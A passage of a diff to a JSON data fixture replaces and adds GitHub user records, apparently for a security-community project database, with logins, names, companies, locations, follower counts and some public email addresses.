"name": "axiao", - "login": "joostshao", + "nest_created_at": "2024-09-22T06:44:55.762Z", + "nest_updated_at": "2024-09-22T19:39:22.089Z", + "name": "", + "login": "drfoofoo", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/3615951?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/118049775?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 387, - "followers_count": 39, + "following_count": 0, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 16, - "created_at": "2013-02-17T06:49:27Z", - "updated_at": "2024-09-10T12:14:00Z", - "node_id": "MDQ6VXNlcjM2MTU5NTE=", + "public_repositories_count": 2, + "created_at": "2022-11-12T09:54:39Z", + "updated_at": "2022-11-12T15:51:06Z", + "node_id": "U_kgDOBwlL7w", "bio": "", "is_hireable": false, "twitter_username": "" @@ -381953,24 +638702,24 @@ }, { "model": "github.user", - "pk": 869, + "pk": 6112, "fields": { - "nest_created_at": "2024-09-11T22:14:29.444Z", - "nest_updated_at": "2024-09-11T22:14:29.444Z", - "name": "", - "login": "spinetrak", + "nest_created_at": "2024-09-22T06:44:56.434Z", + "nest_updated_at": "2024-09-22T19:39:22.709Z", + "name": "Mike", + "login": "mike386", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/5498066?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/31588539?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2013-09-19T23:28:41Z", - "updated_at": "2020-06-02T18:56:25Z", - "node_id": "MDQ6VXNlcjU0OTgwNjY=", + "public_repositories_count": 0, + "created_at": "2017-09-03T11:21:27Z", + "updated_at": "2024-06-04T12:07:44Z", + "node_id": "MDQ6VXNlcjMxNTg4NTM5", "bio": "", "is_hireable": false, "twitter_username": "" @@ -381978,24 +638727,24 @@ }, { "model": "github.user", - "pk": 870, + "pk": 6113, "fields": { - "nest_created_at": "2024-09-11T22:14:30.318Z", - "nest_updated_at": "2024-09-11T22:14:30.318Z", - "name": "Clayton Daley", - "login": "claytondaley", + "nest_created_at": "2024-09-22T06:44:57.092Z", + "nest_updated_at": "2024-09-22T19:39:23.329Z", + "name": "", + "login": "pentesttools-com", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1097439?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/139468926?v=4", "company": "", - "location": "Chicago, IL", + "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 4, + "followers_count": 13, "public_gists_count": 0, - "public_repositories_count": 48, - "created_at": "2011-10-02T23:11:44Z", - "updated_at": "2024-04-22T14:29:26Z", - "node_id": "MDQ6VXNlcjEwOTc0Mzk=", + "public_repositories_count": 51, + "created_at": "2023-07-13T12:57:24Z", + "updated_at": "2024-02-15T15:14:43Z", + "node_id": "U_kgDOCFAgfg", "bio": "", "is_hireable": false, "twitter_username": "" @@ -382003,49 +638752,49 @@ }, { "model": "github.user", - "pk": 871, + "pk": 6114, "fields": { - "nest_created_at": "2024-09-11T22:14:32.864Z", - "nest_updated_at": "2024-09-11T22:14:32.864Z", - "name": "", - "login": "marpe", + "nest_created_at": "2024-09-22T06:44:57.717Z", + "nest_updated_at": "2024-09-22T19:39:23.947Z", + "name": "Matthew Sudol", + "login": "msudol", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1239842?v=4", - "company": "", - "location": "Sweden", + "avatar_url": "https://avatars.githubusercontent.com/u/8793963?v=4", + "company": "@ulfsri", + "location": "", "collaborators_count": 0, - "following_count": 5, + "following_count": 22, "followers_count": 8, - "public_gists_count": 5, - "public_repositories_count": 7, - "created_at": "2011-12-04T15:10:55Z", - "updated_at": "2024-09-02T17:24:06Z", - "node_id": "MDQ6VXNlcjEyMzk4NDI=", - "bio": "", + "public_gists_count": 8, + "public_repositories_count": 67, + "created_at": "2014-09-16T14:40:42Z", + "updated_at": "2024-07-24T19:06:19Z", + "node_id": "MDQ6VXNlcjg3OTM5NjM=", + "bio": "Experienced Security Engineer & Developer. ", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 872, + "pk": 6115, "fields": { - "nest_created_at": "2024-09-11T22:14:36.582Z", - "nest_updated_at": "2024-09-11T22:14:36.582Z", - "name": "", - "login": "aadewojo", + "nest_created_at": "2024-09-22T06:44:59.069Z", + "nest_updated_at": "2024-09-22T19:39:25.252Z", + "name": "Guilherme Junqueira", + "login": "guilhermej", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/12172327?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/8609457?v=4", + "company": "Solyd Offensive Security", + "location": "Brasil", "collaborators_count": 0, "following_count": 1, - "followers_count": 0, + "followers_count": 522, "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2015-04-29T15:11:30Z", - "updated_at": "2022-03-15T15:19:07Z", - "node_id": "MDQ6VXNlcjEyMTcyMzI3", + "public_repositories_count": 43, + "created_at": "2014-09-01T01:43:07Z", + "updated_at": "2023-10-31T19:13:29Z", + "node_id": "MDQ6VXNlcjg2MDk0NTc=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -382053,24 +638802,24 @@ }, { "model": "github.user", - "pk": 873, + "pk": 6116, "fields": { - "nest_created_at": "2024-09-11T22:14:37.423Z", - "nest_updated_at": "2024-09-11T22:14:37.423Z", - "name": "", - "login": "gbyram", + "nest_created_at": "2024-09-22T06:44:59.736Z", + "nest_updated_at": "2024-09-22T19:39:25.885Z", + "name": "Gabriele", + "login": "gabriele-costa", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/2376145?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/10499254?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 2, + "followers_count": 8, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2012-09-19T06:26:13Z", - "updated_at": "2017-06-01T03:31:05Z", - "node_id": "MDQ6VXNlcjIzNzYxNDU=", + "public_repositories_count": 19, + "created_at": "2015-01-12T13:33:53Z", + "updated_at": "2024-07-28T07:53:40Z", + "node_id": "MDQ6VXNlcjEwNDk5MjU0", "bio": "", "is_hireable": false, "twitter_username": "" @@ -382078,49 +638827,74 @@ }, { "model": "github.user", - "pk": 874, + "pk": 6117, "fields": { - "nest_created_at": "2024-09-11T22:14:38.234Z", - "nest_updated_at": "2024-09-11T22:14:38.234Z", - "name": "ok_fish", - "login": "hepanming007", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/4394665?v=4", - "company": "", - "location": "xiamen", + "nest_created_at": "2024-09-22T06:45:00.056Z", + "nest_updated_at": "2024-09-22T19:39:26.221Z", + "name": "Dolev Farhi", + "login": "dolevf", + "email": "farhi.dolev@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/5857304?v=4", + "company": "Palo Alto Networks", + "location": "Canada", "collaborators_count": 0, - "following_count": 3, - "followers_count": 3, - "public_gists_count": 0, - "public_repositories_count": 26, - "created_at": "2013-05-10T08:23:33Z", - "updated_at": "2024-06-09T02:09:39Z", - "node_id": "MDQ6VXNlcjQzOTQ2NjU=", + "following_count": 2, + "followers_count": 339, + "public_gists_count": 1, + "public_repositories_count": 27, + "created_at": "2013-11-05T05:35:27Z", + "updated_at": "2024-08-09T01:36:56Z", + "node_id": "MDQ6VXNlcjU4NTczMDQ=", "bio": "", "is_hireable": false, + "twitter_username": "dolevfarhi" + } +}, +{ + "model": "github.user", + "pk": 6118, + "fields": { + "nest_created_at": "2024-09-22T06:45:00.373Z", + "nest_updated_at": "2024-09-22T19:39:26.567Z", + "name": "Daniel Carlier", + "login": "Krlier", + "email": "daniel.carlier@hotmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/40367872?v=4", + "company": "@quintoandar", + "location": "Rio de Janeiro", + "collaborators_count": 0, + "following_count": 38, + "followers_count": 40, + "public_gists_count": 0, + "public_repositories_count": 19, + "created_at": "2018-06-18T18:15:18Z", + "updated_at": "2024-01-09T13:03:23Z", + "node_id": "MDQ6VXNlcjQwMzY3ODcy", + "bio": "Application Security Engineer", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 875, + "pk": 6119, "fields": { - "nest_created_at": "2024-09-11T22:14:39.115Z", - "nest_updated_at": "2024-09-11T22:14:39.115Z", + "nest_created_at": "2024-09-22T06:45:00.687Z", + "nest_updated_at": "2024-09-22T19:39:26.877Z", "name": "", - "login": "kamilmedia", + "login": "becojo", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/10331099?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/172889?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2014-12-28T15:03:41Z", - "updated_at": "2017-04-08T23:20:14Z", - "node_id": "MDQ6VXNlcjEwMzMxMDk5", + "following_count": 106, + "followers_count": 93, + "public_gists_count": 41, + "public_repositories_count": 33, + "created_at": "2009-12-28T06:13:02Z", + "updated_at": "2024-08-21T18:34:54Z", + "node_id": "MDQ6VXNlcjE3Mjg4OQ==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -382128,24 +638902,24 @@ }, { "model": "github.user", - "pk": 876, + "pk": 6120, "fields": { - "nest_created_at": "2024-09-11T22:14:40.011Z", - "nest_updated_at": "2024-09-11T22:14:40.011Z", - "name": "Kunwar Khalid", - "login": "Kunwark", + "nest_created_at": "2024-09-22T06:45:01.316Z", + "nest_updated_at": "2024-09-22T19:39:27.499Z", + "name": "Antoine Neuenschwander", + "login": "antoinet", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/13748763?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/435018?v=4", + "company": "Cookies Inc.", + "location": "Zürich", "collaborators_count": 0, - "following_count": 5, - "followers_count": 2, - "public_gists_count": 0, - "public_repositories_count": 5, - "created_at": "2015-08-11T13:09:59Z", - "updated_at": "2024-09-11T11:15:57Z", - "node_id": "MDQ6VXNlcjEzNzQ4NzYz", + "following_count": 34, + "followers_count": 83, + "public_gists_count": 1, + "public_repositories_count": 41, + "created_at": "2010-10-11T07:22:03Z", + "updated_at": "2024-09-20T05:06:44Z", + "node_id": "MDQ6VXNlcjQzNTAxOA==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -382153,24 +638927,49 @@ }, { "model": "github.user", - "pk": 877, + "pk": 6121, "fields": { - "nest_created_at": "2024-09-11T22:14:40.914Z", - "nest_updated_at": "2024-09-11T22:14:40.914Z", - "name": "nextglory", - "login": "nextglory", + "nest_created_at": "2024-09-22T06:45:01.966Z", + "nest_updated_at": "2024-09-22T19:39:28.137Z", + "name": "Adam Piper", + "login": "ahri", + "email": "adam@ahri.net", + "avatar_url": "https://avatars.githubusercontent.com/u/1332?v=4", + "company": "@PortSwigger ", + "location": "Manchester, UK", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 46, + "public_gists_count": 30, + "public_repositories_count": 101, + "created_at": "2008-02-28T00:13:56Z", + "updated_at": "2024-09-12T20:25:39Z", + "node_id": "MDQ6VXNlcjEzMzI=", + "bio": "", + "is_hireable": false, + "twitter_username": "bitwog" + } +}, +{ + "model": "github.user", + "pk": 6122, + "fields": { + "nest_created_at": "2024-09-22T06:45:05.542Z", + "nest_updated_at": "2024-09-22T20:23:47.447Z", + "name": "Bruce Mayhew", + "login": "mayhew64", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/5190756?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/3689202?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 10, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 32, - "created_at": "2013-08-08T14:43:19Z", - "updated_at": "2023-05-11T05:09:04Z", - "node_id": "MDQ6VXNlcjUxOTA3NTY=", + "following_count": 0, + "followers_count": 4, + "public_gists_count": 1, + "public_repositories_count": 5, + "created_at": "2013-02-25T01:21:07Z", + "updated_at": "2024-08-05T23:08:02Z", + "node_id": "MDQ6VXNlcjM2ODkyMDI=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -382178,49 +638977,49 @@ }, { "model": "github.user", - "pk": 878, + "pk": 6123, "fields": { - "nest_created_at": "2024-09-11T22:14:41.831Z", - "nest_updated_at": "2024-09-11T22:14:41.831Z", - "name": "David Ortega", - "login": "UrsaForce", - "email": "david.ortega.m@outlook.com", - "avatar_url": "https://avatars.githubusercontent.com/u/8815984?v=4", - "company": "Clarika", - "location": "Guayaquil", + "nest_created_at": "2024-09-22T06:45:13.668Z", + "nest_updated_at": "2024-09-22T19:46:22.465Z", + "name": "SathIsh AshwIn", + "login": "sath9600", + "email": "sath9600@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/9526255?v=4", + "company": "", + "location": "Chennai", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 2, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2014-09-18T04:47:52Z", - "updated_at": "2024-02-12T04:35:01Z", - "node_id": "MDQ6VXNlcjg4MTU5ODQ=", - "bio": "Full stack web developer always willing to learn new stuff and have fun coding.", - "is_hireable": true, + "public_repositories_count": 15, + "created_at": "2014-11-03T06:36:50Z", + "updated_at": "2020-07-08T05:26:14Z", + "node_id": "MDQ6VXNlcjk1MjYyNTU=", + "bio": "A Process-oriented seasoned cyber security professional.", + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 879, + "pk": 6124, "fields": { - "nest_created_at": "2024-09-11T22:14:42.689Z", - "nest_updated_at": "2024-09-11T22:14:42.689Z", - "name": "Stephen Flynn", - "login": "sf32738", + "nest_created_at": "2024-09-22T06:45:13.990Z", + "nest_updated_at": "2024-09-22T19:46:22.786Z", + "name": "Sebastian Arriada", + "login": "sebarriada", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/9754218?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/20249766?v=4", "company": "", - "location": "Florida", + "location": "Argentina", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2014-11-14T21:41:36Z", - "updated_at": "2023-11-25T20:42:22Z", - "node_id": "MDQ6VXNlcjk3NTQyMTg=", + "public_repositories_count": 1, + "created_at": "2016-07-01T23:21:15Z", + "updated_at": "2021-04-20T13:15:23Z", + "node_id": "MDQ6VXNlcjIwMjQ5NzY2", "bio": "", "is_hireable": false, "twitter_username": "" @@ -382228,24 +639027,24 @@ }, { "model": "github.user", - "pk": 880, + "pk": 6125, "fields": { - "nest_created_at": "2024-09-11T22:14:43.617Z", - "nest_updated_at": "2024-09-11T22:14:43.617Z", + "nest_created_at": "2024-09-22T06:45:14.306Z", + "nest_updated_at": "2024-09-22T19:46:23.102Z", "name": "", - "login": "goresci", + "login": "michsec", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1907579?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/45041779?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2012-06-29T22:27:18Z", - "updated_at": "2021-06-02T13:49:25Z", - "node_id": "MDQ6VXNlcjE5MDc1Nzk=", + "public_repositories_count": 0, + "created_at": "2018-11-14T15:19:58Z", + "updated_at": "2018-12-19T13:31:22Z", + "node_id": "MDQ6VXNlcjQ1MDQxNzc5", "bio": "", "is_hireable": false, "twitter_username": "" @@ -382253,24 +639052,24 @@ }, { "model": "github.user", - "pk": 881, + "pk": 6126, "fields": { - "nest_created_at": "2024-09-11T22:14:44.462Z", - "nest_updated_at": "2024-09-11T22:14:44.462Z", - "name": "Michael Garvin", - "login": "dinobot71", - "email": "mike@prometheuspredicatedcoding.com", - "avatar_url": "https://avatars.githubusercontent.com/u/18564924?v=4", - "company": "Prometheus Predicated Coding", - "location": "Ottawa, ON, Canada", + "nest_created_at": "2024-09-22T06:45:14.940Z", + "nest_updated_at": "2024-09-22T19:46:23.769Z", + "name": "", + "login": "kefish", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/9419650?v=4", + "company": "", + "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 1, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2016-04-20T02:16:56Z", - "updated_at": "2024-07-25T03:08:39Z", - "node_id": "MDQ6VXNlcjE4NTY0OTI0", + "public_repositories_count": 0, + "created_at": "2014-10-27T16:26:44Z", + "updated_at": "2016-02-27T20:54:52Z", + "node_id": "MDQ6VXNlcjk0MTk2NTA=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -382278,49 +639077,49 @@ }, { "model": "github.user", - "pk": 882, + "pk": 6127, "fields": { - "nest_created_at": "2024-09-11T22:14:45.357Z", - "nest_updated_at": "2024-09-11T22:14:45.357Z", - "name": "G. Giani", - "login": "g-giani", + "nest_created_at": "2024-09-22T06:45:15.893Z", + "nest_updated_at": "2024-09-22T19:46:24.745Z", + "name": "Jonny Ro", + "login": "BavariaBlue", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/17945120?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/16705095?v=4", "company": "", - "location": "Germany", + "location": "Regensburg (Ratisbona)", "collaborators_count": 0, "following_count": 4, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2016-03-19T09:21:42Z", - "updated_at": "2024-07-22T14:55:13Z", - "node_id": "MDQ6VXNlcjE3OTQ1MTIw", + "followers_count": 0, + "public_gists_count": 1, + "public_repositories_count": 10, + "created_at": "2016-01-14T14:58:21Z", + "updated_at": "2021-08-03T09:50:10Z", + "node_id": "MDQ6VXNlcjE2NzA1MDk1", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 883, + "pk": 6128, "fields": { - "nest_created_at": "2024-09-11T22:14:46.210Z", - "nest_updated_at": "2024-09-11T22:14:46.210Z", - "name": "", - "login": "adamjeff", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/8728740?v=4", + "nest_created_at": "2024-09-22T06:45:16.206Z", + "nest_updated_at": "2024-09-22T19:46:25.064Z", + "name": "Connor Carr", + "login": "connorcarr", + "email": "concaib@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/26408590?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2014-09-10T21:23:47Z", - "updated_at": "2016-09-08T10:37:18Z", - "node_id": "MDQ6VXNlcjg3Mjg3NDA=", + "public_gists_count": 1, + "public_repositories_count": 7, + "created_at": "2017-03-14T12:14:40Z", + "updated_at": "2023-12-07T10:09:56Z", + "node_id": "MDQ6VXNlcjI2NDA4NTkw", "bio": "", "is_hireable": false, "twitter_username": "" @@ -382328,99 +639127,99 @@ }, { "model": "github.user", - "pk": 884, + "pk": 6129, "fields": { - "nest_created_at": "2024-09-11T22:14:47.071Z", - "nest_updated_at": "2024-09-11T22:14:47.071Z", - "name": "Mohamed Akef", - "login": "mohamed-akef", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1524321?v=4", - "company": "@Sharwa", - "location": "Egypt", + "nest_created_at": "2024-09-22T06:45:17.560Z", + "nest_updated_at": "2024-09-22T19:46:43.344Z", + "name": "Johan Lindfors", + "login": "johanlindfors", + "email": "johan.lindfors@live.com", + "avatar_url": "https://avatars.githubusercontent.com/u/614071?v=4", + "company": "@Truesec", + "location": "Stockholm", "collaborators_count": 0, - "following_count": 36, + "following_count": 18, "followers_count": 25, - "public_gists_count": 4, - "public_repositories_count": 20, - "created_at": "2012-03-10T22:38:37Z", - "updated_at": "2024-07-04T09:31:48Z", - "node_id": "MDQ6VXNlcjE1MjQzMjE=", - "bio": "Software engineer, Gamer & Cars lover", + "public_gists_count": 7, + "public_repositories_count": 46, + "created_at": "2011-02-12T07:26:52Z", + "updated_at": "2024-09-17T09:40:38Z", + "node_id": "MDQ6VXNlcjYxNDA3MQ==", + "bio": "At Truesec since January 2021", "is_hireable": false, - "twitter_username": "Mohamed3kef" + "twitter_username": "johanlindfors" } }, { "model": "github.user", - "pk": 885, + "pk": 6130, "fields": { - "nest_created_at": "2024-09-11T22:14:47.875Z", - "nest_updated_at": "2024-09-11T22:14:47.875Z", - "name": "Julian Wood", - "login": "orinoco", - "email": "jwoodchip@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/3967161?v=4", + "nest_created_at": "2024-09-22T06:45:18.199Z", + "nest_updated_at": "2024-09-22T19:46:27.022Z", + "name": "Mika Mäkelä", + "login": "MakelaM", + "email": "mika.m.makela@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/34064211?v=4", "company": "", - "location": "Calgary, Alberta", + "location": "Vantaa, Finland", "collaborators_count": 0, "following_count": 0, "followers_count": 3, - "public_gists_count": 4, + "public_gists_count": 0, "public_repositories_count": 13, - "created_at": "2013-03-25T18:01:35Z", - "updated_at": "2024-08-20T19:09:28Z", - "node_id": "MDQ6VXNlcjM5NjcxNjE=", - "bio": "Full stack developer", + "created_at": "2017-11-28T13:30:33Z", + "updated_at": "2021-01-31T17:21:59Z", + "node_id": "MDQ6VXNlcjM0MDY0MjEx", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 886, + "pk": 6131, "fields": { - "nest_created_at": "2024-09-11T22:14:48.717Z", - "nest_updated_at": "2024-09-11T22:14:48.717Z", - "name": "Starbeamrainbowlabs", - "login": "sbrl", - "email": "sbrl@starbeamrainbowlabs.com", - "avatar_url": "https://avatars.githubusercontent.com/u/9929737?v=4", - "company": "", - "location": "Nowhere, everywhere and anywhere in between", + "nest_created_at": "2024-09-22T06:45:18.853Z", + "nest_updated_at": "2024-09-22T19:46:27.655Z", + "name": "Peter Gallagher", + "login": "petegallagher", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/688331?v=4", + "company": "@KainosSoftwareLtd ", + "location": "Belfast", "collaborators_count": 0, - "following_count": 13, - "followers_count": 141, - "public_gists_count": 70, - "public_repositories_count": 83, - "created_at": "2014-11-24T11:31:26Z", - "updated_at": "2024-09-09T08:25:43Z", - "node_id": "MDQ6VXNlcjk5Mjk3Mzc=", - "bio": "A PhD computer science researcher who loves to explore and learn new things.", + "following_count": 0, + "followers_count": 10, + "public_gists_count": 4, + "public_repositories_count": 49, + "created_at": "2011-03-24T13:46:49Z", + "updated_at": "2024-09-16T11:24:39Z", + "node_id": "MDQ6VXNlcjY4ODMzMQ==", + "bio": "", "is_hireable": false, - "twitter_username": "SBRLabs" + "twitter_username": "" } }, { "model": "github.user", - "pk": 887, + "pk": 6132, "fields": { - "nest_created_at": "2024-09-11T22:14:49.556Z", - "nest_updated_at": "2024-09-11T22:14:50.442Z", - "name": "", - "login": "seekyong", + "nest_created_at": "2024-09-22T06:45:19.484Z", + "nest_updated_at": "2024-09-22T19:46:28.378Z", + "name": "john ellingsworth", + "login": "john-ellingsworth", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/11072899?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/44237891?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, + "following_count": 10, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2015-02-19T10:20:17Z", - "updated_at": "2023-12-30T01:57:18Z", - "node_id": "MDQ6VXNlcjExMDcyODk5", + "public_repositories_count": 1, + "created_at": "2018-10-17T15:35:28Z", + "updated_at": "2024-07-11T19:38:14Z", + "node_id": "MDQ6VXNlcjQ0MjM3ODkx", "bio": "", "is_hireable": false, "twitter_username": "" @@ -382428,24 +639227,24 @@ }, { "model": "github.user", - "pk": 888, + "pk": 6133, "fields": { - "nest_created_at": "2024-09-11T22:14:51.323Z", - "nest_updated_at": "2024-09-11T22:14:51.323Z", + "nest_created_at": "2024-09-22T06:45:19.805Z", + "nest_updated_at": "2024-09-22T19:46:28.715Z", "name": "", - "login": "aynaz96", + "login": "soisetu", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/27864779?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/12621578?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2017-04-21T17:22:19Z", - "updated_at": "2021-08-01T13:08:09Z", - "node_id": "MDQ6VXNlcjI3ODY0Nzc5", + "public_repositories_count": 2, + "created_at": "2015-05-27T05:31:19Z", + "updated_at": "2020-11-29T20:59:16Z", + "node_id": "MDQ6VXNlcjEyNjIxNTc4", "bio": "", "is_hireable": false, "twitter_username": "" @@ -382453,64 +639252,114 @@ }, { "model": "github.user", - "pk": 889, + "pk": 6134, "fields": { - "nest_created_at": "2024-09-11T22:14:52.232Z", - "nest_updated_at": "2024-09-11T22:14:52.232Z", - "name": "Mr. Zhang,", - "login": "CrazyCodes", + "nest_created_at": "2024-09-22T06:45:20.119Z", + "nest_updated_at": "2024-09-22T19:46:29.022Z", + "name": "", + "login": "unk1nd0n3", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/9151227?v=4", - "company": "Beijing municipal", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/10438202?v=4", + "company": "", + "location": "Kiev, Ukraine", "collaborators_count": 0, - "following_count": 44, - "followers_count": 134, + "following_count": 0, + "followers_count": 9, "public_gists_count": 0, - "public_repositories_count": 19, - "created_at": "2014-10-11T11:48:51Z", - "updated_at": "2024-09-04T06:42:37Z", - "node_id": "MDQ6VXNlcjkxNTEyMjc=", - "bio": "Every line of code is art", - "is_hireable": false, + "public_repositories_count": 16, + "created_at": "2015-01-07T17:16:48Z", + "updated_at": "2022-07-14T08:32:10Z", + "node_id": "MDQ6VXNlcjEwNDM4MjAy", + "bio": "", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 890, + "pk": 6135, "fields": { - "nest_created_at": "2024-09-11T22:14:53.334Z", - "nest_updated_at": "2024-09-11T22:14:54.141Z", + "nest_created_at": "2024-09-22T06:45:25.428Z", + "nest_updated_at": "2024-09-22T18:31:59.871Z", "name": "", - "login": "anonymuos1", + "login": "Bilge", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/5244508?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/470626?v=4", + "company": "@ScriptFUSION ", + "location": "All my code is golfed", "collaborators_count": 0, - "following_count": 0, + "following_count": 33, + "followers_count": 51, + "public_gists_count": 1, + "public_repositories_count": 107, + "created_at": "2010-11-06T22:47:41Z", + "updated_at": "2024-09-05T06:17:54Z", + "node_id": "MDQ6VXNlcjQ3MDYyNg==", + "bio": "It's never too late to start writing good code.\r\nCode for future you.\r\nExperience is anticipating edge cases.\r\nWeak programmers are afraid of spaces. ", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 6136, + "fields": { + "nest_created_at": "2024-09-22T06:45:26.063Z", + "nest_updated_at": "2024-09-22T18:32:00.500Z", + "name": "jeffrey n. carre", + "login": "bleuscyther", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2999487?v=4", + "company": "fruitsbytes", + "location": "Haiti", + "collaborators_count": 0, + "following_count": 44, + "followers_count": 8, + "public_gists_count": 1, + "public_repositories_count": 42, + "created_at": "2012-12-09T04:13:36Z", + "updated_at": "2024-07-17T23:17:13Z", + "node_id": "MDQ6VXNlcjI5OTk0ODc=", + "bio": "✔Software Engineer\r\n✔Graphic Designer\r\n✔Future Game Dev", + "is_hireable": true, + "twitter_username": "jeffrey_n_carre" + } +}, +{ + "model": "github.user", + "pk": 6137, + "fields": { + "nest_created_at": "2024-09-22T06:45:33.580Z", + "nest_updated_at": "2024-09-22T18:32:07.825Z", + "name": "Rakesh", + "login": "rakeshkachhadiya", + "email": "rakeshkachhadiya@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/3531697?v=4", + "company": "Ehotel hmbh", + "location": "Berlin", + "collaborators_count": 0, + "following_count": 4, "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2013-08-16T12:20:47Z", - "updated_at": "2021-04-21T16:20:56Z", - "node_id": "MDQ6VXNlcjUyNDQ1MDg=", + "public_gists_count": 1, + "public_repositories_count": 11, + "created_at": "2013-02-11T11:37:02Z", + "updated_at": "2024-09-11T18:04:17Z", + "node_id": "MDQ6VXNlcjM1MzE2OTc=", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 891, + "pk": 6138, "fields": { - "nest_created_at": "2024-09-11T22:14:55.003Z", - "nest_updated_at": "2024-09-11T22:14:55.003Z", - "name": "Irshad Ansari", - "login": "irshadalif", - "email": "irshadahmed.ansari@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/19163108?v=4", + "nest_created_at": "2024-09-22T06:45:33.896Z", + "nest_updated_at": "2024-09-22T18:32:08.135Z", + "name": "", + "login": "emmanuelbenoist", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5310689?v=4", "company": "", "location": "", "collaborators_count": 0, @@ -382518,9 +639367,9 @@ "followers_count": 0, "public_gists_count": 0, "public_repositories_count": 0, - "created_at": "2016-05-03T06:18:45Z", - "updated_at": "2021-10-21T17:19:30Z", - "node_id": "MDQ6VXNlcjE5MTYzMTA4", + "created_at": "2013-08-26T08:39:25Z", + "updated_at": "2024-02-15T16:39:26Z", + "node_id": "MDQ6VXNlcjUzMTA2ODk=", "bio": "", "is_hireable": false, "twitter_username": "" 